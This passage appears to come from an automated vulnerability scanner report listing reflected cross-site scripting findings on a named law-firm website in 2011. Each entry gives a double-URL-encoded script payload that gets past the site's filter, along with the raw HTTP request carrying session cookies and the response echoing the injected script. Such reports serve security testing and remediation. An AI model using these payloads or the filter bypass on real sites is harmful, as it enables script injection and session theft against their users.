<input type="hidden" name="404;http://www.wileyrein.com:80/cssbdd5f"><script>alert(1)</script>672638c3b/_main.css" value="">
...[SNIP]...

4.146. http://www.wileyrein.com/css/_main.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_main.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1b51%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e450c96039aa was submitted in the REST URL parameter 2. This input was echoed as f1b51"><script>alert(1)</script>450c96039aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_main.cssf1b51%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e450c96039aa HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_main.cssf1b51"><script>alert(1)</script>450c96039aa" value="">
...[SNIP]...

4.147. http://www.wileyrein.com/css/_navMenu.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_navMenu.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de5e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e848b9694317 was submitted in the REST URL parameter 1. This input was echoed as de5e6"><script>alert(1)</script>848b9694317 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssde5e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e848b9694317/_navMenu.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssde5e6"><script>alert(1)</script>848b9694317/_navMenu.css" value="">
...[SNIP]...

4.148. http://www.wileyrein.com/css/_navMenu.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_navMenu.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95db9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaee734d6695 was submitted in the REST URL parameter 2. This input was echoed as 95db9"><script>alert(1)</script>aee734d6695 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_navMenu.css95db9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaee734d6695 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_navMenu.css95db9"><script>alert(1)</script>aee734d6695" value="">
...[SNIP]...

4.149. http://www.wileyrein.com/css/_navSearch.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_navSearch.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25b68%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5762ef40df was submitted in the REST URL parameter 1. This input was echoed as 25b68"><script>alert(1)</script>c5762ef40df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css25b68%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5762ef40df/_navSearch.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css25b68"><script>alert(1)</script>c5762ef40df/_navSearch.css" value="">
...[SNIP]...

4.150. http://www.wileyrein.com/css/_navSearch.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_navSearch.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd77a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a210746c61 was submitted in the REST URL parameter 2. This input was echoed as fd77a"><script>alert(1)</script>0a210746c61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_navSearch.cssfd77a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a210746c61 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_navSearch.cssfd77a"><script>alert(1)</script>0a210746c61" value="">
...[SNIP]...

4.151. http://www.wileyrein.com/css/_slide.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_slide.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17ef6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4bcf499c51 was submitted in the REST URL parameter 1. This input was echoed as 17ef6"><script>alert(1)</script>b4bcf499c51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css17ef6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4bcf499c51/_slide.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css17ef6"><script>alert(1)</script>b4bcf499c51/_slide.css" value="">
...[SNIP]...

4.152. http://www.wileyrein.com/css/_slide.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_slide.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf9115355d was submitted in the REST URL parameter 2. This input was echoed as dfc8a"><script>alert(1)</script>df9115355d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_slide.cssdfc8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf9115355d HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_slide.cssdfc8a"><script>alert(1)</script>df9115355d" value="">
...[SNIP]...

4.153. http://www.wileyrein.com/css/main.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51eff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e085a170e769 was submitted in the REST URL parameter 1. This input was echoed as 51eff"><script>alert(1)</script>085a170e769 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css51eff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e085a170e769/main.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css51eff"><script>alert(1)</script>085a170e769/main.css" value="">
...[SNIP]...

4.154. http://www.wileyrein.com/css/main.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb5e2c8ed40b was submitted in the REST URL parameter 2. This input was echoed as 78b32"><script>alert(1)</script>b5e2c8ed40b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/main.css78b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb5e2c8ed40b HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/main.css78b32"><script>alert(1)</script>b5e2c8ed40b" value="">
...[SNIP]...

4.155. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.accordion.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8d52b987de was submitted in the REST URL parameter 1. This input was echoed as 78055"><script>alert(1)</script>a8d52b987de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css78055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8d52b987de/ui/ui.accordion.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css78055"><script>alert(1)</script>a8d52b987de/ui/ui.accordion.css" value="">
...[SNIP]...

4.156. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.accordion.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 801be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35c17289cf6 was submitted in the REST URL parameter 2. This input was echoed as 801be"><script>alert(1)</script>35c17289cf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui801be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35c17289cf6/ui.accordion.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui801be"><script>alert(1)</script>35c17289cf6/ui.accordion.css" value="">
...[SNIP]...

4.157. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.accordion.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2a82%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb61ee3f3a8a was submitted in the REST URL parameter 3. This input was echoed as a2a82"><script>alert(1)</script>b61ee3f3a8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.accordion.cssa2a82%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb61ee3f3a8a HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.accordion.cssa2a82"><script>alert(1)</script>b61ee3f3a8a" value="">
...[SNIP]...

4.158. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.all.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 874a6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebba185a7c96 was submitted in the REST URL parameter 1. This input was echoed as 874a6"><script>alert(1)</script>bba185a7c96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css874a6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebba185a7c96/ui/ui.all.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css874a6"><script>alert(1)</script>bba185a7c96/ui/ui.all.css" value="">
...[SNIP]...

4.159. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.all.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e27d4aec5989 was submitted in the REST URL parameter 2. This input was echoed as 3782d"><script>alert(1)</script>27d4aec5989 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui3782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e27d4aec5989/ui.all.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui3782d"><script>alert(1)</script>27d4aec5989/ui.all.css" value="">
...[SNIP]...

4.160. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.all.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb48dfbd1665 was submitted in the REST URL parameter 3. This input was echoed as c332a"><script>alert(1)</script>b48dfbd1665 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.all.cssc332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb48dfbd1665 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
